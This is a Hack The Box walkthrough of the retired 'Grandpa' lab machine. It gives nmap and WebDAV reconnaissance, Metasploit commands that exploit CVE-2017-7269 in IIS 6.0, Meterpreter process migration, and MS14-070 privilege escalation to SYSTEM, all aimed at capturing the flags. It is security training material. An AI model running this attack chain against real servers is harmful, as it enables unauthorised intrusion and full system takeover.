Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge
We will use the following tools to pawn the box on a Kali Linux box
- nmap
- Searchsploit
- davtest
- Metasploit
- Local exploit suggester
Let's get started.
I add grandpa on the /etc/hosts file
nano /etc/hostswith
10.10.10.14 grandpa.htb
Step 1 - Reconnaissance
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.
Ports scanning
I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to perform an intensive scan:
nmap -A -v grandpa.htb-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
grandpa.htb: hostname for the Grandpa box
If you find the results a little bit too overwhelming, you can do another command to get only the open ports.
nmap grandpa.htb
We can see that there is only 1 open port:
Port 80. most often used by Hypertext Transfer Protocol (HTTP)
We know that the server is an IIS 6.0 from the http-server-header. Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server software created by Microsoft for use with the Windows NT family. More info here
IIS 6.0 (code name "Duct Tape"), included with Windows Server 2003 and Windows XP Professional x64 Edition, added support for IPv6 and included a new worker process model that increased security as well as reliability HTTP.sys was introduced in IIS 6.0 as an HTTP-specific protocol listener for HTTP requests
We can also see from the http-title that the website is "under construction" and that there is a http-webdav-scan with all the allowed methods
I use nmap script to try to get more information. The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by doing pattern matching in the response body
nmap --script http-webdav-scan -p80 grandpa.htbHere is more info on this script from the nmap website
WebDAV or Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. More info here
We can see on the server support section that Microsoft's IIS has a WebDAV module.
I use davtest to check if I can upload files
I use the following command
davtest -url http://10.10.10.14
It doesn't look like. I use Searchsploit to check if there is any known vulnerability on IIS 6.0. Searchsploit is a command line search tool for Exploit Database
I use the following command
searchsploit iis 6.0
I can have more details on the exploit with
searchsploit -x 41738.py
The attack is based on a Return-oriented programming chain. Return-oriented programming (ROP) is a security exploit technique that allows an attacker to execute code in the presence of security defense such as executable space protection and code signing
You can also check the Exploit Database to find the exploit
the National Vulnerability Database
the Common Vulnerabilities and Exposure database
There is one Metasploit module available
Step 2 - Visiting the website
We don't see much when visiting the website. From the developer console - we can see it's powered by the ASP.NET framework
We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders
I launch Metasploit Framework on Kali and look for command I should use to launch the exploit
If I use this command
searchsploit iis 6.0I get the same table that I had from the Terminal earlier
If I type
search iis 6.0I get 174 results
The exploit I'm interested in is number 147 on this list
If you want to have some information on the exploit, you can use the following command
info exploit/windows/iis/iis_webdav_scstoragepathfromurlAnd you will get more details on the exploit
I use the following command to use the exploit
use exploit/windows/iis/iis_webdav_scstoragepathfromurlI need to set up the options before launching the exploit. I check the options with
show options
I set the RHOSTS with the following command
set RHOSTS 10.10.10.14When I check again the options, I get this
I check if the target is vulnerable with
checkThen I run the exploit with the command
exploit
And I get a Meterpreter session
From the Offensive Security website, we get this definition for Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here
Let's start by gathering some information
getuid returns the real user ID of the calling process. The session I got doesn't seem to have enough privileges to run this command. The access is denied
When this happens, I list the running processes with
psand pick one running NT AUTHORITY\NETWORK SERVICE
I migrate to the process 3644 with
migrate 3644
Now when I check getuid, I got
Server username: NT AUTHORITY\NETWORK SERVICE
This was the session I got at first before migrating to another process
This is the session I got after migrating to another process
I type the following command to get a standard shell on the target system
shell
I check who I am on the machine with the command
whoami
I get more information from the machine with
systeminfo
I navigate to C:\
then Documents and Settings with
cd "Documents and Settings"
I can see two users - Administrator and Harry. I try to navigate to Harry. The access is denied. Same for the Administrator folder - which is expected as I don't have root access yet
I exit the shell with the command
exit
Step 3 - Using local exploit suggester
I run the local exploit suggester. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter
run post/multi/recon/local_exploit_suggester
I will use the MS14-070 exploit. I look for some more information on Metasploit with
info exploit/windows/local/ms14_070_tcpip_ioctl
As well as on the Rapid7 website
Step 4 - Using MS14-070 to perform privilege escalation
I put this session in the background with the command
background
I run the following command to use the exploit I found
use exploit/windows/local/ms14_070_tcpip_ioctl
I then check for the options of this exploit
I set the session with
set SESSION 1
I run the exploit with
run
The exploit succeeded but I didn't get a shell back. I check the options
and set the LHOST to my IP with
set LHOST 10.10.14.36You can check yours here
I then run the exploit with
exploit
This confirms that the exploit has succeeded but I still don't get a shell. I check the session with
sessions -lI should have
NT AUTHORITY\SYSTEM
Which is not the case now so I go back to this session with
sessions -i 1
I check getuid and get NT AUTHORITY\SYSTEM back. I get a standard shell on the target system and check who am I on the machine. I get NT AUTHORITY\NETWORK SERVICE back, which is not what I want!
I exit this shell and check the processes. I can see that I have admin access on the machine. I just meed to migrate to another process - which I do with
migrate 408
Back to the standard shell on the target system and when I check who I am on the machine I'm finally an admin!
Step 5 - Looking for the user.txt flag
I navigate to the Harry folder from the Documents and Settings
I can list all the files/folders with the following command
dirI then move to the Desktop
And I find the user flag! I can check the content of the file with
type user.txt
Step 6 - Looking for the root.txt flag
Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!
I use the following command to see the content of the file
type root.txt
Congrats! You found both flags!
Please donβt hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here
You can follow me on Twitter or on LinkedIn
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
- Keep Calm and Hack The Box - Lame
- Keep Calm and Hack The Box - Legacy
- Keep Calm and Hack The Box - Devel
- Keep Calm and Hack The Box - Beep
- Keep Calm and Hack The Box - Optimum
- Keep Calm and Hack The Box - Arctic
